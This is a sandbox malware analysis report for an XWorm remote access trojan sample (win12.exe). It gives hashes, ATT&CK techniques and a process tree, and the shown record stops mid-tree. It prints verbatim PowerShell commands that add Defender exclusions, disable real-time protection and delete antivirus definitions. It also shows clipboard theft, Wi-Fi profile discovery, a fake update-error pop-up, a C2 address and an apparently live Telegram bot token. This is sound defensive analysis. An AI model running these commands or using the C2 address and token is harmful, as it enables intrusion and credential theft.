xworm | ace47168d15ff37ea019a11bc0ad4f5353d277a9a9ebee6eeccb3101727cfb73

Resubmissions

28-11-2024 18:39

241128-xa2qvswmbw 10

28-11-2024 18:35

241128-w8brnawlfs 10

Analysis

max time kernel
106s
max time network
145s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
28-11-2024 18:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

win12.exe
Size

7.8MB
MD5

1f9e89517854258c99877b23abe2e045
SHA1

bddfa736ca2b22faa1e566f365c38f28b806bc95
SHA256

6f32596ebd4cb3ac5feb00f1b3f71ed03eb28db04df44d878c6531240b1f3171
SHA512

9659bf4f6d515e0338af4ada26d2bb31e2eb046f0ac9811b5d509c2edfa0d64957efcf53a0fb3c484b45469b9d7ff759eb268b4d478e0205e3bf7a9f6af36672
SSDEEP

196608:45/HYUwfI9jUCzi4H1qSiXLGVi7DMgpZ3QJVM9QwCEc/jM:iYIHziK1piXLGVE4UeJV5g

Score

10^/10

xworm collection credential_access defense_evasion discovery evasion execution persistence phishing privilege_escalation rat spyware stealer trojan upx

Malware Config

Extracted

Family

xworm

Version

5.0

154.216.19.12:7000

Mutex

NuXVPKhDBKHTLExY

Attributes

install_file
USB.exe
telegram
https://api.telegram.org/bot7991608689:AAFUN71TMgyF_fzKFz6tyyBijaijI3s82tk

aes.plain

Signatures

Deletes Windows Defender Definitions 2 TTPs 2 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
3720	MpCmdRun.exe
3996	MpCmdRun.exe

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x002a000000045187-110.dat	family_xworm
behavioral1/memory/4512-115-0x00000000002D0000-0x00000000002E0000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1872	powershell.exe
3000	powershell.exe
3424	powershell.exe
1916	powershell.exe
3460	powershell.exe
4308	powershell.exe
2456	powershell.exe
2292	powershell.exe
4456	powershell.exe
4508	powershell.exe
5108	powershell.exe

A potential corporate email address has been identified in the URL: FluxJacker@mrfluxdevNewCLient9782E54FE371440C1A35UserNameAdminOSFullNameMicrosoftWindows10EnterpriseLTSCUSBFalseCPUIntelCoreProcessorBroadwellGPUMicrosoftBasicDisplayAdapterRAMErrorGroupFJv1snew
phishing

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-641261377-2215826147-608237349-1000\Control Panel\International\Geo\Nation	bound.exe

Clipboard Data 1 TTPs 4 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2128	cmd.exe
4600	powershell.exe
4080	cmd.exe
456	powershell.exe

Executes dropped EXE 5 IoCs

pid	Process
4512	bound.exe
4364	rar.exe
3140	iezgbg.exe
3076	iezgbg.exe
2852	rar.exe

Loads dropped DLL 34 IoCs

pid	Process
1708	win12.exe
1708	win12.exe
1708	win12.exe
1708	win12.exe
1708	win12.exe
1708	win12.exe
1708	win12.exe
1708	win12.exe
1708	win12.exe
1708	win12.exe
1708	win12.exe
1708	win12.exe
1708	win12.exe
1708	win12.exe
1708	win12.exe
1708	win12.exe
1708	win12.exe
3076	iezgbg.exe
3076	iezgbg.exe
3076	iezgbg.exe
3076	iezgbg.exe
3076	iezgbg.exe
3076	iezgbg.exe
3076	iezgbg.exe
3076	iezgbg.exe
3076	iezgbg.exe
3076	iezgbg.exe
3076	iezgbg.exe
3076	iezgbg.exe
3076	iezgbg.exe
3076	iezgbg.exe
3076	iezgbg.exe
3076	iezgbg.exe
3076	iezgbg.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
22	ip-api.com
45	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 6 IoCs

discovery

Process Discovery

T1057

pid	Process
1644	tasklist.exe
1376	tasklist.exe
3100	tasklist.exe
216	tasklist.exe
2092	tasklist.exe
4300	tasklist.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00280000000451a9-28.dat	upx
behavioral1/memory/1708-32-0x00007FFC5E8C0000-0x00007FFC5EF23000-memory.dmp	upx
behavioral1/memory/1708-36-0x00007FFC72060000-0x00007FFC72087000-memory.dmp	upx
behavioral1/files/0x00280000000451a7-37.dat	upx
behavioral1/files/0x002900000004518c-35.dat	upx
behavioral1/memory/1708-39-0x00007FFC77770000-0x00007FFC7777F000-memory.dmp	upx
behavioral1/files/0x002800000004519b-56.dat	upx
behavioral1/files/0x002800000004519a-55.dat	upx
behavioral1/files/0x0028000000045199-54.dat	upx
behavioral1/files/0x0028000000045198-53.dat	upx
behavioral1/files/0x0028000000045197-52.dat	upx
behavioral1/files/0x0028000000045196-51.dat	upx
behavioral1/files/0x0028000000045195-50.dat	upx
behavioral1/files/0x002900000004518b-49.dat	upx
behavioral1/files/0x00280000000451ae-48.dat	upx
behavioral1/files/0x00280000000451ad-47.dat	upx
behavioral1/files/0x00280000000451ac-46.dat	upx
behavioral1/files/0x00280000000451a8-43.dat	upx
behavioral1/files/0x00280000000451a6-42.dat	upx
behavioral1/memory/1708-62-0x00007FFC71FA0000-0x00007FFC71FCB000-memory.dmp	upx
behavioral1/memory/1708-66-0x00007FFC71E60000-0x00007FFC71E85000-memory.dmp	upx
behavioral1/memory/1708-65-0x00007FFC77000000-0x00007FFC77019000-memory.dmp	upx
behavioral1/memory/1708-68-0x00007FFC6DAC0000-0x00007FFC6DC3F000-memory.dmp	upx
behavioral1/memory/1708-70-0x00007FFC74150000-0x00007FFC74169000-memory.dmp	upx
behavioral1/memory/1708-72-0x00007FFC76B00000-0x00007FFC76B0D000-memory.dmp	upx
behavioral1/memory/1708-78-0x00007FFC71E20000-0x00007FFC71E54000-memory.dmp	upx
behavioral1/memory/1708-79-0x00007FFC5E380000-0x00007FFC5E8B3000-memory.dmp	upx
behavioral1/memory/1708-81-0x00007FFC6E520000-0x00007FFC6E5EE000-memory.dmp	upx
behavioral1/memory/1708-77-0x00007FFC5E8C0000-0x00007FFC5EF23000-memory.dmp	upx
behavioral1/memory/1708-84-0x00007FFC72B50000-0x00007FFC72B64000-memory.dmp	upx
behavioral1/memory/1708-83-0x00007FFC72060000-0x00007FFC72087000-memory.dmp	upx
behavioral1/memory/1708-86-0x00007FFC74020000-0x00007FFC7402D000-memory.dmp	upx
behavioral1/memory/1708-92-0x00007FFC6DE20000-0x00007FFC6DED3000-memory.dmp	upx
behavioral1/memory/1708-243-0x00007FFC71E60000-0x00007FFC71E85000-memory.dmp	upx
behavioral1/memory/1708-277-0x00007FFC6DAC0000-0x00007FFC6DC3F000-memory.dmp	upx
behavioral1/memory/1708-342-0x00007FFC76B00000-0x00007FFC76B0D000-memory.dmp	upx
behavioral1/memory/1708-353-0x00007FFC71E20000-0x00007FFC71E54000-memory.dmp	upx
behavioral1/memory/1708-355-0x00007FFC5E380000-0x00007FFC5E8B3000-memory.dmp	upx
behavioral1/memory/1708-376-0x00007FFC6E520000-0x00007FFC6E5EE000-memory.dmp	upx
behavioral1/memory/1708-384-0x00007FFC6DAC0000-0x00007FFC6DC3F000-memory.dmp	upx
behavioral1/memory/1708-378-0x00007FFC5E8C0000-0x00007FFC5EF23000-memory.dmp	upx
behavioral1/memory/1708-408-0x00007FFC5E8C0000-0x00007FFC5EF23000-memory.dmp	upx
behavioral1/memory/3076-460-0x00007FFC594B0000-0x00007FFC59A9E000-memory.dmp	upx
behavioral1/memory/3076-462-0x00007FFC728E0000-0x00007FFC728EF000-memory.dmp	upx
behavioral1/memory/3076-461-0x00007FFC64EE0000-0x00007FFC64F04000-memory.dmp	upx
behavioral1/memory/3076-467-0x00007FFC5A8B0000-0x00007FFC5A8DD000-memory.dmp	upx
behavioral1/memory/3076-468-0x00007FFC64890000-0x00007FFC648A9000-memory.dmp	upx
behavioral1/memory/3076-469-0x00007FFC5A880000-0x00007FFC5A8A3000-memory.dmp	upx
behavioral1/memory/3076-470-0x00007FFC59330000-0x00007FFC594A6000-memory.dmp	upx
behavioral1/memory/3076-471-0x00007FFC64330000-0x00007FFC64349000-memory.dmp	upx
behavioral1/memory/3076-472-0x00007FFC71E10000-0x00007FFC71E1D000-memory.dmp	upx
behavioral1/memory/3076-473-0x00007FFC5A650000-0x00007FFC5A683000-memory.dmp	upx
behavioral1/memory/3076-475-0x00007FFC59260000-0x00007FFC5932D000-memory.dmp	upx
behavioral1/memory/3076-480-0x00007FFC58D10000-0x00007FFC58D24000-memory.dmp	upx
behavioral1/memory/3076-479-0x00007FFC6E4E0000-0x00007FFC6E4ED000-memory.dmp	upx
behavioral1/memory/3076-478-0x00007FFC64EE0000-0x00007FFC64F04000-memory.dmp	upx
behavioral1/memory/3076-477-0x00007FFC58D30000-0x00007FFC59252000-memory.dmp	upx
behavioral1/memory/3076-474-0x00007FFC594B0000-0x00007FFC59A9E000-memory.dmp	upx
behavioral1/memory/3076-483-0x00007FFC5A8B0000-0x00007FFC5A8DD000-memory.dmp	upx
behavioral1/memory/3076-484-0x00007FFC58BF0000-0x00007FFC58D0C000-memory.dmp	upx
behavioral1/memory/3076-573-0x00007FFC64890000-0x00007FFC648A9000-memory.dmp	upx
behavioral1/memory/3076-609-0x00007FFC5A880000-0x00007FFC5A8A3000-memory.dmp	upx
behavioral1/memory/3076-662-0x00007FFC59330000-0x00007FFC594A6000-memory.dmp	upx
behavioral1/memory/3076-683-0x00007FFC64330000-0x00007FFC64349000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2784	cmd.exe
3384	netsh.exe
644	cmd.exe
1252	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3296	WMIC.exe
3976	WMIC.exe

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1376	systeminfo.exe
3324	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4308	powershell.exe
1872	powershell.exe
3000	powershell.exe
3000	powershell.exe
3424	powershell.exe
4308	powershell.exe
1872	powershell.exe
1872	powershell.exe
3424	powershell.exe
3424	powershell.exe
2808	WMIC.exe
2808	WMIC.exe
2808	WMIC.exe
2808	WMIC.exe
4600	powershell.exe
4600	powershell.exe
3140	powershell.exe
3140	powershell.exe
4600	powershell.exe
3140	powershell.exe
2456	powershell.exe
2456	powershell.exe
4512	bound.exe
3896	powershell.exe
3896	powershell.exe
3576	WMIC.exe
3576	WMIC.exe
3576	WMIC.exe
3576	WMIC.exe
4768	WMIC.exe
4768	WMIC.exe
4768	WMIC.exe
4768	WMIC.exe
1720	WMIC.exe
1720	WMIC.exe
1720	WMIC.exe
1720	WMIC.exe
2292	powershell.exe
2292	powershell.exe
3296	WMIC.exe
3296	WMIC.exe
3296	WMIC.exe
3296	WMIC.exe
4956	powershell.exe
4956	powershell.exe
1916	powershell.exe
1916	powershell.exe
1916	powershell.exe
4456	powershell.exe
4456	powershell.exe
3460	powershell.exe
3460	powershell.exe
3460	powershell.exe
1644	WMIC.exe
1644	WMIC.exe
1644	WMIC.exe
1644	WMIC.exe
4456	powershell.exe
4456	powershell.exe
456	powershell.exe
456	powershell.exe
456	powershell.exe
3148	powershell.exe
3148	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4308	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	3424	powershell.exe
Token: SeDebugPrivilege	2092	tasklist.exe
Token: SeDebugPrivilege	4300	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3000	powershell.exe
Token: SeSecurityPrivilege	3000	powershell.exe
Token: SeTakeOwnershipPrivilege	3000	powershell.exe
Token: SeLoadDriverPrivilege	3000	powershell.exe
Token: SeSystemProfilePrivilege	3000	powershell.exe
Token: SeSystemtimePrivilege	3000	powershell.exe
Token: SeProfSingleProcessPrivilege	3000	powershell.exe
Token: SeIncBasePriorityPrivilege	3000	powershell.exe
Token: SeCreatePagefilePrivilege	3000	powershell.exe
Token: SeBackupPrivilege	3000	powershell.exe
Token: SeRestorePrivilege	3000	powershell.exe
Token: SeShutdownPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeSystemEnvironmentPrivilege	3000	powershell.exe
Token: SeRemoteShutdownPrivilege	3000	powershell.exe
Token: SeUndockPrivilege	3000	powershell.exe
Token: SeManageVolumePrivilege	3000	powershell.exe
Token: 33	3000	powershell.exe
Token: 34	3000	powershell.exe
Token: 35	3000	powershell.exe
Token: 36	3000	powershell.exe
Token: SeIncreaseQuotaPrivilege	2808	WMIC.exe
Token: SeSecurityPrivilege	2808	WMIC.exe
Token: SeTakeOwnershipPrivilege	2808	WMIC.exe
Token: SeLoadDriverPrivilege	2808	WMIC.exe
Token: SeSystemProfilePrivilege	2808	WMIC.exe
Token: SeSystemtimePrivilege	2808	WMIC.exe
Token: SeProfSingleProcessPrivilege	2808	WMIC.exe
Token: SeIncBasePriorityPrivilege	2808	WMIC.exe
Token: SeCreatePagefilePrivilege	2808	WMIC.exe
Token: SeBackupPrivilege	2808	WMIC.exe
Token: SeRestorePrivilege	2808	WMIC.exe
Token: SeShutdownPrivilege	2808	WMIC.exe
Token: SeDebugPrivilege	2808	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2808	WMIC.exe
Token: SeRemoteShutdownPrivilege	2808	WMIC.exe
Token: SeUndockPrivilege	2808	WMIC.exe
Token: SeManageVolumePrivilege	2808	WMIC.exe
Token: 33	2808	WMIC.exe
Token: 34	2808	WMIC.exe
Token: 35	2808	WMIC.exe
Token: 36	2808	WMIC.exe
Token: SeDebugPrivilege	4600	powershell.exe
Token: SeIncreaseQuotaPrivilege	4308	powershell.exe
Token: SeSecurityPrivilege	4308	powershell.exe
Token: SeTakeOwnershipPrivilege	4308	powershell.exe
Token: SeLoadDriverPrivilege	4308	powershell.exe
Token: SeSystemProfilePrivilege	4308	powershell.exe
Token: SeSystemtimePrivilege	4308	powershell.exe
Token: SeProfSingleProcessPrivilege	4308	powershell.exe
Token: SeIncBasePriorityPrivilege	4308	powershell.exe
Token: SeCreatePagefilePrivilege	4308	powershell.exe
Token: SeBackupPrivilege	4308	powershell.exe
Token: SeRestorePrivilege	4308	powershell.exe
Token: SeShutdownPrivilege	4308	powershell.exe
Token: SeDebugPrivilege	4308	powershell.exe
Token: SeSystemEnvironmentPrivilege	4308	powershell.exe
Token: SeRemoteShutdownPrivilege	4308	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4512	bound.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 936 wrote to memory of 1708	936	win12.exe	82
PID 936 wrote to memory of 1708	936	win12.exe	82
PID 1708 wrote to memory of 3696	1708	win12.exe	83
PID 1708 wrote to memory of 3696	1708	win12.exe	83
PID 1708 wrote to memory of 4064	1708	win12.exe	84
PID 1708 wrote to memory of 4064	1708	win12.exe	84
PID 1708 wrote to memory of 1420	1708	win12.exe	85
PID 1708 wrote to memory of 1420	1708	win12.exe	85
PID 1708 wrote to memory of 3140	1708	win12.exe	86
PID 1708 wrote to memory of 3140	1708	win12.exe	86
PID 1708 wrote to memory of 2964	1708	win12.exe	87
PID 1708 wrote to memory of 2964	1708	win12.exe	87
PID 1708 wrote to memory of 3564	1708	win12.exe	92
PID 1708 wrote to memory of 3564	1708	win12.exe	92
PID 1420 wrote to memory of 3000	1420	cmd.exe	95
PID 1420 wrote to memory of 3000	1420	cmd.exe	95
PID 3696 wrote to memory of 1872	3696	cmd.exe	96
PID 3696 wrote to memory of 1872	3696	cmd.exe	96
PID 4064 wrote to memory of 4308	4064	cmd.exe	97
PID 4064 wrote to memory of 4308	4064	cmd.exe	97
PID 3140 wrote to memory of 4512	3140	cmd.exe	98
PID 3140 wrote to memory of 4512	3140	cmd.exe	98
PID 1708 wrote to memory of 2972	1708	win12.exe	99
PID 1708 wrote to memory of 2972	1708	win12.exe	99
PID 1708 wrote to memory of 2836	1708	win12.exe	100
PID 1708 wrote to memory of 2836	1708	win12.exe	100
PID 2964 wrote to memory of 3208	2964	cmd.exe	103
PID 2964 wrote to memory of 3208	2964	cmd.exe	103
PID 3564 wrote to memory of 3424	3564	cmd.exe	104
PID 3564 wrote to memory of 3424	3564	cmd.exe	104
PID 2836 wrote to memory of 2092	2836	cmd.exe	105
PID 2836 wrote to memory of 2092	2836	cmd.exe	105
PID 2972 wrote to memory of 4300	2972	cmd.exe	106
PID 2972 wrote to memory of 4300	2972	cmd.exe	106
PID 1708 wrote to memory of 4280	1708	win12.exe	107
PID 1708 wrote to memory of 4280	1708	win12.exe	107
PID 1708 wrote to memory of 2128	1708	win12.exe	108
PID 1708 wrote to memory of 2128	1708	win12.exe	108
PID 1708 wrote to memory of 2108	1708	win12.exe	111
PID 1708 wrote to memory of 2108	1708	win12.exe	111
PID 1708 wrote to memory of 3544	1708	win12.exe	112
PID 1708 wrote to memory of 3544	1708	win12.exe	112
PID 1708 wrote to memory of 2784	1708	win12.exe	113
PID 1708 wrote to memory of 2784	1708	win12.exe	113
PID 1708 wrote to memory of 5044	1708	win12.exe	114
PID 1708 wrote to memory of 5044	1708	win12.exe	114
PID 1708 wrote to memory of 4760	1708	win12.exe	118
PID 1708 wrote to memory of 4760	1708	win12.exe	118
PID 4280 wrote to memory of 2808	4280	cmd.exe	122
PID 4280 wrote to memory of 2808	4280	cmd.exe	122
PID 2128 wrote to memory of 4600	2128	cmd.exe	123
PID 2128 wrote to memory of 4600	2128	cmd.exe	123
PID 2784 wrote to memory of 3384	2784	cmd.exe	124
PID 2784 wrote to memory of 3384	2784	cmd.exe	124
PID 4760 wrote to memory of 3140	4760	cmd.exe	125
PID 4760 wrote to memory of 3140	4760	cmd.exe	125
PID 3544 wrote to memory of 112	3544	cmd.exe	127
PID 3544 wrote to memory of 112	3544	cmd.exe	127
PID 2108 wrote to memory of 1644	2108	cmd.exe	128
PID 2108 wrote to memory of 1644	2108	cmd.exe	128
PID 5044 wrote to memory of 1376	5044	cmd.exe	129
PID 5044 wrote to memory of 1376	5044	cmd.exe	129
PID 1708 wrote to memory of 1720	1708	win12.exe	171
PID 1708 wrote to memory of 1720	1708	win12.exe	171

C:\Users\Admin\AppData\Local\Temp\win12.exe
"C:\Users\Admin\AppData\Local\Temp\win12.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:936
- C:\Users\Admin\AppData\Local\Temp\win12.exe
  "C:\Users\Admin\AppData\Local\Temp\win12.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\win12.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\win12.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4308
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:3720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1420
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3140
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      PID:4512
    - - C:\Users\Admin\AppData\Local\Temp\iezgbg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iezgbg.exe"
        5⤵
        Executes dropped EXE
        
        PID:3140
      - C:\Users\Admin\AppData\Local\Temp\iezgbg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iezgbg.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\iezgbg.exe'"
        7⤵
        
        PID:1720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\iezgbg.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1916
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        7⤵
        
        PID:4000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4456
        
        C:\Program Files\Windows Defender\MpCmdRun.exe
        
        "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        8⤵
        Deletes Windows Defender Definitions
        
        PID:3996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Window recent update failed. Hang on it will retry in few minutes', 0, 'Error', 32+16);close()""
        7⤵
        
        PID:4524
        
        C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Window recent update failed. Hang on it will retry in few minutes', 0, 'Error', 32+16);close()"
        8⤵
        
        PID:3444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
        7⤵
        
        PID:3184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3460
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:1104
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        
        PID:3100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:4420
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        
        PID:1376
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        7⤵
        
        PID:2404
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1644
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        7⤵
        Clipboard Data
        
        PID:4080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        8⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:3212
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        
        PID:216
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:1604
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:5108
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        7⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:644
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        8⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1252
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        7⤵
        
        PID:2796
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        8⤵
        Gathers system information
        
        PID:3324
        
        C:\Windows\system32\cmd.exe
        
